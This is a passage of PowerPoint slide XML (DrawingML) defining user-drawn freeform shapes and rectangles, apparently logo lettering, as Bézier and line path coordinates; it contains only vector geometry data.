                        <a:pt x="17" y="4"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="19" y="5"/>
                        <a:pt x="19" y="7"/>
                        <a:pt x="19" y="9"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="19" y="10"/>
                        <a:pt x="19" y="12"/>
                        <a:pt x="18" y="13"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="17" y="14"/>
                        <a:pt x="16" y="15"/>
                        <a:pt x="15" y="16"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="13" y="17"/>
                        <a:pt x="11" y="17"/>
                        <a:pt x="9" y="17"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="20" y="31"/>
                        <a:pt x="20" y="31"/>
                        <a:pt x="20" y="31"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="16" y="31"/>
                        <a:pt x="16" y="31"/>
                        <a:pt x="16" y="31"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="5" y="17"/>
                        <a:pt x="5" y="17"/>
                        <a:pt x="5" y="17"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="3" y="17"/>
                        <a:pt x="3" y="17"/>
                        <a:pt x="3" y="17"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="3" y="31"/>
                        <a:pt x="3" y="31"/>
                        <a:pt x="3" y="31"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="0" y="31"/>
                        <a:pt x="0" y="31"/>
                        <a:pt x="0" y="31"/>
                      </a:cubicBezTo>
                      <a:lnTo>
                        <a:pt x="0" y="0"/>
                      </a:lnTo>
                      <a:close/>
                      <a:moveTo>
                        <a:pt x="3" y="3"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="3" y="14"/>
                        <a:pt x="3" y="14"/>
                        <a:pt x="3" y="14"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="8" y="14"/>
                        <a:pt x="8" y="14"/>
                        <a:pt x="8" y="14"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="10" y="14"/>
                        <a:pt x="12" y="14"/>
                        <a:pt x="13" y="13"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="14" y="13"/>
                        <a:pt x="15" y="12"/>
                        <a:pt x="15" y="11"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="16" y="11"/>
                        <a:pt x="16" y="10"/>
                        <a:pt x="16" y="9"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="16" y="8"/>
                        <a:pt x="16" y="7"/>
                        <a:pt x="15" y="6"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="15" y="5"/>
                        <a:pt x="14" y="4"/>
                        <a:pt x="13" y="4"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="12" y="4"/>
                        <a:pt x="11" y="3"/>
                        <a:pt x="8" y="3"/>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332"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="10312400" y="4554538"/>
                  <a:ext cx="52388" cy="73025"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 0 w 33"/>
                    <a:gd name="T1" fmla="*/ 0 h 46"/>
                    <a:gd name="T2" fmla="*/ 6 w 33"/>
                    <a:gd name="T3" fmla="*/ 0 h 46"/>
                    <a:gd name="T4" fmla="*/ 17 w 33"/>
                    <a:gd name="T5" fmla="*/ 19 h 46"/>
                    <a:gd name="T6" fmla="*/ 28 w 33"/>
                    <a:gd name="T7" fmla="*/ 0 h 46"/>
                    <a:gd name="T8" fmla="*/ 33 w 33"/>
                    <a:gd name="T9" fmla="*/ 0 h 46"/>
                    <a:gd name="T10" fmla="*/ 19 w 33"/>
                    <a:gd name="T11" fmla="*/ 24 h 46"/>
                    <a:gd name="T12" fmla="*/ 19 w 33"/>
                    <a:gd name="T13" fmla="*/ 46 h 46"/>
                    <a:gd name="T14" fmla="*/ 15 w 33"/>
                    <a:gd name="T15" fmla="*/ 46 h 46"/>
                    <a:gd name="T16" fmla="*/ 15 w 33"/>
                    <a:gd name="T17" fmla="*/ 24 h 46"/>
                    <a:gd name="T18" fmla="*/ 0 w 33"/>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46">
                      <a:moveTo>
                        <a:pt x="0" y="0"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="6" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="17" y="19"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="28" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="33" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="19" y="24"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="19" y="46"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="15" y="46"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="15" y="2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Rectangle 333"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeArrowheads="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="10469563" y="4592638"/>
                  <a:ext cx="3524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Rectangle 334"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeArrowheads="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="10469563" y="4564063"/>
                  <a:ext cx="35242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Rectangle 335"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeArrowheads="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="9894888" y="4648201"/>
                  <a:ext cx="539750"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336"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="10412413" y="4592638"/>
                  <a:ext cx="57150" cy="66675"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 14 w 36"/>
                    <a:gd name="T1" fmla="*/ 42 h 42"/>
                    <a:gd name="T2" fmla="*/ 36 w 36"/>
                    <a:gd name="T3" fmla="*/ 20 h 42"/>
                    <a:gd name="T4" fmla="*/ 36 w 36"/>
                    <a:gd name="T5" fmla="*/ 0 h 42"/>
                    <a:gd name="T6" fmla="*/ 0 w 36"/>
                    <a:gd name="T7" fmla="*/ 36 h 42"/>
                    <a:gd name="T8" fmla="*/ 14 w 36"/>
                    <a:gd name="T9" fmla="*/ 42 h 42"/>
                  </a:gdLst>
                  <a:ahLst/>
                  <a:cxnLst>
                    <a:cxn ang="0">
                      <a:pos x="T0" y="T1"/>
                    </a:cxn>
                    <a:cxn ang="0">
                      <a:pos x="T2" y="T3"/>
                    </a:cxn>
                    <a:cxn ang="0">
                      <a:pos x="T4" y="T5"/>
                    </a:cxn>
                    <a:cxn ang="0">
                      <a:pos x="T6" y="T7"/>
                    </a:cxn>
                    <a:cxn ang="0">
                      <a:pos x="T8" y="T9"/>
                    </a:cxn>
                  </a:cxnLst>
                  <a:rect l="0" t="0" r="r" b="b"/>
                  <a:pathLst>
                    <a:path w="36" h="42">
                      <a:moveTo>
                        <a:pt x="14" y="42"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="36" y="20"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="36" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="36"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="1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337"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="9950450" y="4405313"/>
                  <a:ext cx="41275" cy="76200"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 0 w 18"/>
                    <a:gd name="T1" fmla="*/ 26 h 33"/>
                    <a:gd name="T2" fmla="*/ 3 w 18"/>
                    <a:gd name="T3" fmla="*/ 25 h 33"/>
                    <a:gd name="T4" fmla="*/ 9 w 18"/>
                    <a:gd name="T5" fmla="*/ 30 h 33"/>
                    <a:gd name="T6" fmla="*/ 12 w 18"/>
                    <a:gd name="T7" fmla="*/ 29 h 33"/>
                    <a:gd name="T8" fmla="*/ 14 w 18"/>
                    <a:gd name="T9" fmla="*/ 27 h 33"/>
                    <a:gd name="T10" fmla="*/ 15 w 18"/>
                    <a:gd name="T11" fmla="*/ 24 h 33"/>
                    <a:gd name="T12" fmla="*/ 14 w 18"/>
                    <a:gd name="T13" fmla="*/ 21 h 33"/>
                    <a:gd name="T14" fmla="*/ 8 w 18"/>
                    <a:gd name="T15" fmla="*/ 16 h 33"/>
                    <a:gd name="T16" fmla="*/ 4 w 18"/>
                    <a:gd name="T17" fmla="*/ 12 h 33"/>
                    <a:gd name="T18" fmla="*/ 2 w 18"/>
                    <a:gd name="T19" fmla="*/ 8 h 33"/>
                    <a:gd name="T20" fmla="*/ 3 w 18"/>
                    <a:gd name="T21" fmla="*/ 4 h 33"/>
                    <a:gd name="T22" fmla="*/ 6 w 18"/>
                    <a:gd name="T23" fmla="*/ 1 h 33"/>
                    <a:gd name="T24" fmla="*/ 9 w 18"/>
                    <a:gd name="T25" fmla="*/ 0 h 33"/>
                    <a:gd name="T26" fmla="*/ 13 w 18"/>
                    <a:gd name="T27" fmla="*/ 2 h 33"/>
                    <a:gd name="T28" fmla="*/ 17 w 18"/>
                    <a:gd name="T29" fmla="*/ 5 h 33"/>
                    <a:gd name="T30" fmla="*/ 15 w 18"/>
                    <a:gd name="T31" fmla="*/ 7 h 33"/>
                    <a:gd name="T32" fmla="*/ 12 w 18"/>
                    <a:gd name="T33" fmla="*/ 4 h 33"/>
                    <a:gd name="T34" fmla="*/ 9 w 18"/>
                    <a:gd name="T35" fmla="*/ 4 h 33"/>
                    <a:gd name="T36" fmla="*/ 6 w 18"/>
                    <a:gd name="T37" fmla="*/ 5 h 33"/>
                    <a:gd name="T38" fmla="*/ 5 w 18"/>
                    <a:gd name="T39" fmla="*/ 7 h 33"/>
                    <a:gd name="T40" fmla="*/ 6 w 18"/>
                    <a:gd name="T41" fmla="*/ 9 h 33"/>
                    <a:gd name="T42" fmla="*/ 7 w 18"/>
                    <a:gd name="T43" fmla="*/ 11 h 33"/>
                    <a:gd name="T44" fmla="*/ 11 w 18"/>
                    <a:gd name="T45" fmla="*/ 15 h 33"/>
                    <a:gd name="T46" fmla="*/ 16 w 18"/>
                    <a:gd name="T47" fmla="*/ 20 h 33"/>
                    <a:gd name="T48" fmla="*/ 18 w 18"/>
                    <a:gd name="T49" fmla="*/ 24 h 33"/>
                    <a:gd name="T50" fmla="*/ 15 w 18"/>
                    <a:gd name="T51" fmla="*/ 30 h 33"/>
                    <a:gd name="T52" fmla="*/ 9 w 18"/>
                    <a:gd name="T53" fmla="*/ 33 h 33"/>
                    <a:gd name="T54" fmla="*/ 4 w 18"/>
                    <a:gd name="T55" fmla="*/ 31 h 33"/>
                    <a:gd name="T56" fmla="*/ 0 w 18"/>
                    <a:gd name="T57" fmla="*/ 2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33">
                      <a:moveTo>
                        <a:pt x="0" y="26"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="3" y="25"/>
                        <a:pt x="3" y="25"/>
                        <a:pt x="3" y="25"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="4" y="28"/>
                        <a:pt x="7" y="30"/>
                        <a:pt x="9" y="30"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="10" y="30"/>
                        <a:pt x="11" y="29"/>
                        <a:pt x="12" y="29"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="13" y="28"/>
                        <a:pt x="13" y="28"/>
                        <a:pt x="14" y="27"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="14" y="26"/>
                        <a:pt x="15" y="25"/>
                        <a:pt x="15" y="24"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="15" y="23"/>
                        <a:pt x="14" y="22"/>
                        <a:pt x="14" y="21"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="13" y="20"/>
                        <a:pt x="11" y="18"/>
                        <a:pt x="8" y="16"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="6" y="15"/>
                        <a:pt x="4" y="13"/>
                        <a:pt x="4" y="12"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="2" y="11"/>
                        <a:pt x="2" y="9"/>
                        <a:pt x="2" y="8"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="2" y="6"/>
                        <a:pt x="2" y="5"/>
                        <a:pt x="3" y="4"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="4" y="3"/>
                        <a:pt x="4" y="2"/>
                        <a:pt x="6" y="1"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="7" y="1"/>
                        <a:pt x="8" y="0"/>
                        <a:pt x="9" y="0"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="11" y="0"/>
                        <a:pt x="12" y="1"/>
                        <a:pt x="13" y="2"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="15" y="2"/>
                        <a:pt x="16" y="4"/>
                        <a:pt x="17" y="5"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="15" y="7"/>
                        <a:pt x="15" y="7"/>
                        <a:pt x="15" y="7"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="14" y="6"/>
                        <a:pt x="13" y="5"/>
                        <a:pt x="12" y="4"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="11" y="4"/>
                        <a:pt x="10" y="4"/>
                        <a:pt x="9" y="4"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="8" y="4"/>
                        <a:pt x="7" y="4"/>
                        <a:pt x="6" y="5"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="5" y="5"/>
                        <a:pt x="5" y="6"/>
                        <a:pt x="5" y="7"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="5" y="8"/>
                        <a:pt x="5" y="9"/>
                        <a:pt x="6" y="9"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="6" y="10"/>
                        <a:pt x="6" y="11"/>
                        <a:pt x="7" y="11"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="7" y="12"/>
                        <a:pt x="9" y="13"/>
                        <a:pt x="11" y="15"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="14" y="16"/>
                        <a:pt x="15" y="18"/>
                        <a:pt x="16" y="20"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="17" y="21"/>
                        <a:pt x="18" y="23"/>
                        <a:pt x="18" y="24"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="18" y="27"/>
                        <a:pt x="17" y="28"/>
                        <a:pt x="15" y="30"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="14" y="32"/>
                        <a:pt x="12" y="33"/>
                        <a:pt x="9" y="33"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="7" y="33"/>
                        <a:pt x="6" y="32"/>
                        <a:pt x="4" y="31"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="3" y="30"/>
                        <a:pt x="1" y="28"/>
                        <a:pt x="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338"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="10006013" y="4406901"/>
                  <a:ext cx="41275" cy="71438"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 0 w 26"/>
                    <a:gd name="T1" fmla="*/ 0 h 45"/>
                    <a:gd name="T2" fmla="*/ 26 w 26"/>
                    <a:gd name="T3" fmla="*/ 0 h 45"/>
                    <a:gd name="T4" fmla="*/ 26 w 26"/>
                    <a:gd name="T5" fmla="*/ 4 h 45"/>
                    <a:gd name="T6" fmla="*/ 4 w 26"/>
                    <a:gd name="T7" fmla="*/ 4 h 45"/>
                    <a:gd name="T8" fmla="*/ 4 w 26"/>
                    <a:gd name="T9" fmla="*/ 19 h 45"/>
                    <a:gd name="T10" fmla="*/ 26 w 26"/>
                    <a:gd name="T11" fmla="*/ 19 h 45"/>
                    <a:gd name="T12" fmla="*/ 26 w 26"/>
                    <a:gd name="T13" fmla="*/ 23 h 45"/>
                    <a:gd name="T14" fmla="*/ 4 w 26"/>
                    <a:gd name="T15" fmla="*/ 23 h 45"/>
                    <a:gd name="T16" fmla="*/ 4 w 26"/>
                    <a:gd name="T17" fmla="*/ 41 h 45"/>
                    <a:gd name="T18" fmla="*/ 26 w 26"/>
                    <a:gd name="T19" fmla="*/ 41 h 45"/>
                    <a:gd name="T20" fmla="*/ 26 w 26"/>
                    <a:gd name="T21" fmla="*/ 45 h 45"/>
                    <a:gd name="T22" fmla="*/ 0 w 26"/>
                    <a:gd name="T23" fmla="*/ 45 h 45"/>
                    <a:gd name="T24" fmla="*/ 0 w 26"/>
                    <a:gd name="T25"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5">
                      <a:moveTo>
                        <a:pt x="0" y="0"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="26" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="26" y="4"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="4" y="4"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="4" y="19"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="26" y="19"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="26" y="23"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="4" y="23"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="4" y="41"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="26" y="41"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="26" y="45"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="4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339"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="10052050" y="4406901"/>
                  <a:ext cx="38100" cy="71438"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 0 w 24"/>
                    <a:gd name="T1" fmla="*/ 4 h 45"/>
                    <a:gd name="T2" fmla="*/ 0 w 24"/>
                    <a:gd name="T3" fmla="*/ 0 h 45"/>
                    <a:gd name="T4" fmla="*/ 24 w 24"/>
                    <a:gd name="T5" fmla="*/ 0 h 45"/>
                    <a:gd name="T6" fmla="*/ 24 w 24"/>
                    <a:gd name="T7" fmla="*/ 4 h 45"/>
                    <a:gd name="T8" fmla="*/ 14 w 24"/>
                    <a:gd name="T9" fmla="*/ 4 h 45"/>
                    <a:gd name="T10" fmla="*/ 14 w 24"/>
                    <a:gd name="T11" fmla="*/ 45 h 45"/>
                    <a:gd name="T12" fmla="*/ 10 w 24"/>
                    <a:gd name="T13" fmla="*/ 45 h 45"/>
                    <a:gd name="T14" fmla="*/ 10 w 24"/>
                    <a:gd name="T15" fmla="*/ 4 h 45"/>
                    <a:gd name="T16" fmla="*/ 0 w 24"/>
                    <a:gd name="T17" fmla="*/ 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45">
                      <a:moveTo>
                        <a:pt x="0" y="4"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="0" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="24" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="24" y="4"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="14" y="4"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="14" y="45"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="10" y="45"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="1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340"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="10093325" y="4406901"/>
                  <a:ext cx="39688" cy="71438"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 0 w 25"/>
                    <a:gd name="T1" fmla="*/ 4 h 45"/>
                    <a:gd name="T2" fmla="*/ 0 w 25"/>
                    <a:gd name="T3" fmla="*/ 0 h 45"/>
                    <a:gd name="T4" fmla="*/ 25 w 25"/>
                    <a:gd name="T5" fmla="*/ 0 h 45"/>
                    <a:gd name="T6" fmla="*/ 25 w 25"/>
                    <a:gd name="T7" fmla="*/ 4 h 45"/>
                    <a:gd name="T8" fmla="*/ 14 w 25"/>
                    <a:gd name="T9" fmla="*/ 4 h 45"/>
                    <a:gd name="T10" fmla="*/ 14 w 25"/>
                    <a:gd name="T11" fmla="*/ 45 h 45"/>
                    <a:gd name="T12" fmla="*/ 10 w 25"/>
                    <a:gd name="T13" fmla="*/ 45 h 45"/>
                    <a:gd name="T14" fmla="*/ 10 w 25"/>
                    <a:gd name="T15" fmla="*/ 4 h 45"/>
                    <a:gd name="T16" fmla="*/ 0 w 25"/>
                    <a:gd name="T17" fmla="*/ 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45">
                      <a:moveTo>
                        <a:pt x="0" y="4"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="0" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="25" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="25" y="4"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="14" y="4"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="14" y="45"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="10" y="45"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="1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Rectangle 341"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeArrowheads="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="10140950" y="4406901"/>
                  <a:ext cx="7938"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2"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="10164763" y="4406901"/>
                  <a:ext cx="55563" cy="71438"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 0 w 35"/>
                    <a:gd name="T1" fmla="*/ 45 h 45"/>
                    <a:gd name="T2" fmla="*/ 0 w 35"/>
                    <a:gd name="T3" fmla="*/ 0 h 45"/>
                    <a:gd name="T4" fmla="*/ 1 w 35"/>
                    <a:gd name="T5" fmla="*/ 0 h 45"/>
                    <a:gd name="T6" fmla="*/ 31 w 35"/>
                    <a:gd name="T7" fmla="*/ 35 h 45"/>
                    <a:gd name="T8" fmla="*/ 31 w 35"/>
                    <a:gd name="T9" fmla="*/ 0 h 45"/>
                    <a:gd name="T10" fmla="*/ 35 w 35"/>
                    <a:gd name="T11" fmla="*/ 0 h 45"/>
                    <a:gd name="T12" fmla="*/ 35 w 35"/>
                    <a:gd name="T13" fmla="*/ 45 h 45"/>
                    <a:gd name="T14" fmla="*/ 35 w 35"/>
                    <a:gd name="T15" fmla="*/ 45 h 45"/>
                    <a:gd name="T16" fmla="*/ 4 w 35"/>
                    <a:gd name="T17" fmla="*/ 12 h 45"/>
                    <a:gd name="T18" fmla="*/ 4 w 35"/>
                    <a:gd name="T19" fmla="*/ 45 h 45"/>
                    <a:gd name="T20" fmla="*/ 0 w 35"/>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5">
                      <a:moveTo>
                        <a:pt x="0" y="45"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="0" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="1" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="31" y="35"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="31" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="35" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="35" y="45"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="35" y="45"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="4" y="12"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="4" y="45"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="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43"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="10234613" y="4405313"/>
                  <a:ext cx="76200" cy="76200"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 31 w 33"/>
                    <a:gd name="T1" fmla="*/ 6 h 33"/>
                    <a:gd name="T2" fmla="*/ 29 w 33"/>
                    <a:gd name="T3" fmla="*/ 9 h 33"/>
                    <a:gd name="T4" fmla="*/ 23 w 33"/>
                    <a:gd name="T5" fmla="*/ 5 h 33"/>
                    <a:gd name="T6" fmla="*/ 17 w 33"/>
                    <a:gd name="T7" fmla="*/ 3 h 33"/>
                    <a:gd name="T8" fmla="*/ 10 w 33"/>
                    <a:gd name="T9" fmla="*/ 5 h 33"/>
                    <a:gd name="T10" fmla="*/ 5 w 33"/>
                    <a:gd name="T11" fmla="*/ 10 h 33"/>
                    <a:gd name="T12" fmla="*/ 4 w 33"/>
                    <a:gd name="T13" fmla="*/ 16 h 33"/>
                    <a:gd name="T14" fmla="*/ 5 w 33"/>
                    <a:gd name="T15" fmla="*/ 23 h 33"/>
                    <a:gd name="T16" fmla="*/ 11 w 33"/>
                    <a:gd name="T17" fmla="*/ 28 h 33"/>
                    <a:gd name="T18" fmla="*/ 18 w 33"/>
                    <a:gd name="T19" fmla="*/ 30 h 33"/>
                    <a:gd name="T20" fmla="*/ 26 w 33"/>
                    <a:gd name="T21" fmla="*/ 27 h 33"/>
                    <a:gd name="T22" fmla="*/ 30 w 33"/>
                    <a:gd name="T23" fmla="*/ 20 h 33"/>
                    <a:gd name="T24" fmla="*/ 20 w 33"/>
                    <a:gd name="T25" fmla="*/ 20 h 33"/>
                    <a:gd name="T26" fmla="*/ 20 w 33"/>
                    <a:gd name="T27" fmla="*/ 17 h 33"/>
                    <a:gd name="T28" fmla="*/ 33 w 33"/>
                    <a:gd name="T29" fmla="*/ 17 h 33"/>
                    <a:gd name="T30" fmla="*/ 29 w 33"/>
                    <a:gd name="T31" fmla="*/ 28 h 33"/>
                    <a:gd name="T32" fmla="*/ 18 w 33"/>
                    <a:gd name="T33" fmla="*/ 33 h 33"/>
                    <a:gd name="T34" fmla="*/ 4 w 33"/>
                    <a:gd name="T35" fmla="*/ 27 h 33"/>
                    <a:gd name="T36" fmla="*/ 0 w 33"/>
                    <a:gd name="T37" fmla="*/ 16 h 33"/>
                    <a:gd name="T38" fmla="*/ 3 w 33"/>
                    <a:gd name="T39" fmla="*/ 8 h 33"/>
                    <a:gd name="T40" fmla="*/ 9 w 33"/>
                    <a:gd name="T41" fmla="*/ 3 h 33"/>
                    <a:gd name="T42" fmla="*/ 17 w 33"/>
                    <a:gd name="T43" fmla="*/ 0 h 33"/>
                    <a:gd name="T44" fmla="*/ 24 w 33"/>
                    <a:gd name="T45" fmla="*/ 2 h 33"/>
                    <a:gd name="T46" fmla="*/ 31 w 33"/>
                    <a:gd name="T47"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 h="33">
                      <a:moveTo>
                        <a:pt x="31" y="6"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="29" y="9"/>
                        <a:pt x="29" y="9"/>
                        <a:pt x="29" y="9"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="27" y="7"/>
                        <a:pt x="25" y="6"/>
                        <a:pt x="23" y="5"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="21" y="4"/>
                        <a:pt x="19" y="3"/>
                        <a:pt x="17" y="3"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="15" y="3"/>
                        <a:pt x="13" y="4"/>
                        <a:pt x="10" y="5"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
